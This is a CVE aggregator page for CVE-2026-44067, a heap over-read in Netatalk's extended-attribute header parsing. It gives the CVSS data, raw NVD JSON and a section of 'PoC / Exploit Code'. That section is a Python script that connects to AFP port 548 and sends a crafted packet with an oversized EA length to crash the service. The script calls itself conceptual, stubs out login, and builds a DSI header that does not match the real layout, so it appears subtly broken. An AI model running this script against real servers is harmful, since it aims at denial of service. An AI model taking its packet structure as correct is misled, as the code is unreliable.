Security Vulnerability Report
中文
CVE-2026-44067 CVSS 4.2 MEDIUM

CVE-2026-44067

Published: 2026-05-21 08:16:22
Last Modified: 2026-05-21 15:20:19
Source: 33c584b5-0579-4c06-b2a0-8d8329fcab9c

Description

A heap over-read in extended attribute (EA) header parsing in Netatalk 2.1.0 through 4.4.2 allows a remote authenticated attacker to obtain limited information or cause a minor service disruption via crafted EA data.

CVSS Details

CVSS Score
4.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Netatalk 2.1.0 - 4.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket # Conceptual PoC for CVE-2026-44067 # This script demonstrates the logic to trigger the heap over-read. # Requires a valid authenticated session to the AFP service. def send_malicious_ea(target_ip, target_port): try: # 1. Establish TCP connection to Netatalk AFP service (default port 548) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, target_port)) print(f"[+] Connected to {target_ip}:{target_port}") # 2. Perform AFP Handshake and Login (Simplified placeholder) # In a real scenario, specific AFP DSI OpenSession and Login requests are needed. # auth_payload = build_afp_login(username, password) # s.send(auth_payload) # print("[+] Authenticated successfully") # 3. Craft the malicious Extended Attribute (EA) header # The vulnerability triggers when the EA header length field indicates # more data than is actually present in the buffer. # DSI Header structure (simplified) dsi_command = b"\x00\x04" # FPWrite or similar command that handles EAs dsi_request_id = b"\x00\x01\x00\x02" dsi_data_offset = b"\x00\x00\x00\x00" dsi_data_length = b"\x00\x00\x01\x00" # Total length # Malicious EA Header # Setting a large length value without providing sufficient buffer data ea_header_length = b"\xFF\xFF" # Abnormally large length crafted_ea_data = b"A" * 10 # Insufficient actual data payload = dsi_command + dsi_request_id + dsi_data_offset + dsi_data_length payload += ea_header_length + crafted_ea_data # 4. Send the malicious packet s.send(payload) print("[+] Malicious EA packet sent.") # 5. Wait for response or timeout (indicating a crash) s.settimeout(2) try: response = s.recv(1024) print(f"[!] Received response: {response}") except socket.timeout: print("[-] Connection timed out. Service may have crashed (DoS).") s.close() except Exception as e: print(f"[-] Error: {e}") # Usage # send_malicious_ea("192.168.1.10", 548)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44067", "sourceIdentifier": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "published": "2026-05-21T08:16:22.363", "lastModified": "2026-05-21T15:20:19.040", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A heap over-read in extended attribute (EA) header parsing in Netatalk 2.1.0 through 4.4.2 allows a remote authenticated attacker to obtain limited information or cause a minor service disruption via crafted EA data."}], "metrics": {"cvssMetricV31": [{"source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:L", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 2.5}]}, "weaknesses": [{"source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "references": [{"url": "https://netatalk.io/security/CVE-2026-44067", "source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.